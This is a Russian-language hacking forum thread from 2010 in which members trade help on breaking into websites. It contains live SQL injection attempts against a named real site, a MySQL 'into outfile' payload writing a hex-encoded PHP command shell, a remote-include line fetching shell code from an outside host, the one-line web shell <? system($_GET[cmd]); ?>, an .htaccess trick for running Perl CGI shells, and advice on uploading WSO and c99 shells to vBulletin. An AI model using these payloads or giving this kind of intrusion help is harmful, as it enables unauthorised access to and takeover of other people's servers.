Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    328
    Likes Received:
    142
    Reputations:
    81
    DrakonHaSh, грузи другой шел который обходит Safe-mode
     
  2. DrakonHaSh

    DrakonHaSh Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    118
    Likes Received:
    29
    Reputations:
    24
    warlok посоветуй плиз какой конкретно, я пробовал c99madshell и wso2.4, другими не пользовался

    [добавлено]
    попробовал PPS 1.0 - Perl-cgi web shell by Pashkela, но отображается текстом.
    залил такой .htaccess
    Code:
    Options +ExecCGI
    AddHandler cgi-script cgi pl 
    
    проблема решена :)

    но если кто ответит на мои вопросы то тоже будет очень клева ;)
     
    #13022 DrakonHaSh, 17 May 2010
    Last edited: 17 May 2010
  3. B0o0M

    B0o0M Member

    Joined:
    3 Aug 2009
    Messages:
    102
    Likes Received:
    8
    Reputations:
    1
    Не могу составить правильный запрос, наверно дико туплю
    http://www.macemates.net/news.asp?P=7+AND+1=2--
    http://www.macemates.net/news.asp?P=7%27+AND+1=2--
    http://www.macemates.net/news.asp?P=7%29+AND+1=2--
    не прокатывают, как вы составляете правильное выражение ???
    пожалуста пример если можно
     
  4. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    не прокатит
    Microsoft VBScript runtime error '800a000d'

    Type mismatch: 'Cint'

    /news.asp, line 110
     
  5. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    Microsoft JET Database Engine error '80040e14'

    значит бд у нас Microsoft JET Database. следовательно запросы передаются на низком уровне. =(((
     
  6. Saiga

    Saiga New Member

    Joined:
    22 Jul 2008
    Messages:
    49
    Likes Received:
    2
    Reputations:
    1
    здрасте

    Не Могу понять в чем проблема..
    делаю такой запрос :

    6+union+select+1+into+outfile+'1.php'+--+

    на что получил ответ :

    display_db_query: SELECT content from page where id = -6 union select 1 into outfile '1.php' -- File '1.php' already exists

    ТОЕСТЬ я могу создавать файлы ?

    потом делаю что то такое:

    6+union+select+load_file(0x3C3F706173737468727528245F4745545B27636D64275D293B3F3E)+into+outfile+'1.php'+--+

    на что получил ответ :
    display_db_query: SELECT content from page where id = 6 union select load_file(0x3C3F706173737468727528245F4745545B27636D64275D293B3F3E) into outfile '1.php' -- File '1.php' already exists


    и как мне теперь проверить что у меня получилось ?
    где мне найти этот '1.php'

    если кому не лень можна и попадробней в PM

    спс за время. ;)
     
    #13026 Saiga, 18 May 2010
    Last edited: 18 May 2010
  7. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    в дефолтной папке mysql (уже не помню какая) уже есть файл 1.php. Зачем тебе его искать? Можно в /tmp создать
    PS в пм мне не надо писать, я не умею ломать сайты и никогда этим не занимался
     
    2 people like this.
  8. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    494
    Likes Received:
    532
    Reputations:
    158
    да

    @@datadir

    прочитать этот файл через load_file




    P.S. Я на все твои вопросы ответил, ответь на 1 мой. Сколько нужно курить, чтобы составить этот запрос?
     
    3 people like this.
  9. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Можно поподробнее про передачу запросов на низком уровне? Спасибо.
     
    1 person likes this.
  10. b82a

    b82a Elder - Старейшина

    Joined:
    7 Feb 2010
    Messages:
    150
    Likes Received:
    48
    Reputations:
    25
    Ну это, наверное, только при особых условиях
     
  11. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    Какие есть способы заливки шела на vBulletin® Version 3.8.5
     
    #13031 GOGA075, 18 May 2010
    Last edited: 18 May 2010
  12. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    а поиском кто будет пользоватся?
    click
     
    1 person likes this.
  13. B0o0M

    B0o0M Member

    Joined:
    3 Aug 2009
    Messages:
    102
    Likes Received:
    8
    Reputations:
    1
    Да хотелось бы знать что за низкий уровень, и как его использовать
     
  14. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    пробовал так
    cmd=eval(file_get_contents('http://site.ru/downloads/shell.txt'));
    и
    cmd=include($_GET['http://site.ru/downloads/shell.txt']);

    нефига не работают!!
     
  15. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    не больше 60 кб - ничто не мешает вам туда вставить сразу код WSO
     
  16. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    В таком случае форум выдает ошибку
    (но шел востпроизводится)
     
  17. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    классика жанра <? system($_GET[cmd]); ?>
     
  18. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    Gorev Повтарюсь что
    eval
    и
    include
    неработают!!

    удалось только загрузить шел в папку тмп
    и сделать локальный инклуид
    cmd=include("/tmp/shell.php");
    но и в этом случае такая же фигня получается...
     
  19. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    а через passthru пробовал?
     
  20. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    GOGA075

    в сообщении Gorev-a нет Eval или include :)

    тут функция system,будешь работать с командами системы
     
    _________________________
Thread Status:
Not open for further replies.